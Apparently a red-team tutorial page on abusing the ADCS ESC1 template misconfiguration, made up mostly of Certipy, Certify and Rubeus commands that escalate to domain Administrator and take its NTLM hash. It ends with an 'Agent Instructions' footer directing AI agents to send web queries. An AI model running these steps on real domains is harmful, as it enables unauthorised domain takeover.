# ESC1 For this technique to work we need a certificate template with the following requirements: * `ENROLLEE_SUPPLIES_SUBJECT` attribute enabled: this allows the user that initialized the CSR (certificate request) to specify any SAN (subjectAltName) allowing us to request a certificate as any user in the domain * at least one of the following EUK OIDs: Smart Card Logon / PKINIT Authentication / Client Authentication * a user that with enrollment rights * no authorized signatures required This attack vector can be found with Certipy or Certify {% code overflow="wrap" %} ``` certipy find -u otter -p 'SomethingSecure123!' -dc-ip 10.10.10.10 -vulnerable -stdout ``` {% endcode %} ``` .\Certify.exe find /vulnerable ``` Another useful way to enumerate for it is using Powershell queries, this can prove useful if we don't manage to run Certify because of AVs or EDRs running on the host. {% code overflow="wrap" %} ```powershell Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=domain,DC=com' ``` {% endcode %} To abuse it we need to request a certificate using the user with enrollment rights over the template and add a SAN with the `upn` or `altname` flags {% code overflow="wrap" %} ``` certipy req -u otter -p 'SomethingSecure123!' -dc-ip 10.10.10.10 -ca otter-CA -template ESC1 -upn Administrator ``` {% endcode %} {% code overflow="wrap" %} ``` .\Certify.exe request /ca:dc.domain.com\otter-CA /template:ESC1 /altname:administrator@domain.com ``` {% endcode %} The command will get us a `administrator.pfx` certificate that we can use to get the admin's NTLM hash. If we're using Certify we will need to convert the given certificate to a usable format by using the `openssl` command displayed in the output. {% code overflow="wrap" %} ``` certipy auth -pfx administrator.pfx -username administrator -domain domain.com -dc-ip 10.10.10.10 ``` {% endcode %} {% code overflow="wrap" %} ``` .\Rubeus.exe asktgt /user:administrator /certificate:administrator.pfx /getcredentials /nowrap ``` {% endcode %} When working in an environment in which the CBA (Certificate-based Authentication) patch is set to Full Enforcement, whenever a user requests a certificate for an alternate user, the SID of the requesting user is checked against the SID present in the one present in the [szOID\_NTDS\_CA\_SECURITY\_EXT extension](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/e563cff8-1af6-4e6f-a655-7571ca482e71): if there is no match this technique cannot be performed. So in fully patched environment, the normal {% code overflow="wrap" %} ```powershell .\Rubeus.exe asktgt /user:administrator /domain:domain.com /certificate:'C:\Temp\esc1.pfx' /password:'SomethingSecure123!' /dc:dc.domain.com /nowrap /ptt ``` {% endcode %} would not work. To work around this policy we can use Certipy's built-in `sidextension` argument (present in Certipy as well under `extensionsid`) {% code overflow="wrap" fullWidth="false" %} ```powershell .\Certify.exe request /ca:dc.domain.com\otter-CA /template: /altname:administrator /sidextension:-500 /domain:domain.com ``` {% endcode %} You can see more about how the extension works and its uses [here](https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d). --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://otter.gitbook.io/red-teaming/notes/adcs/esc1.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.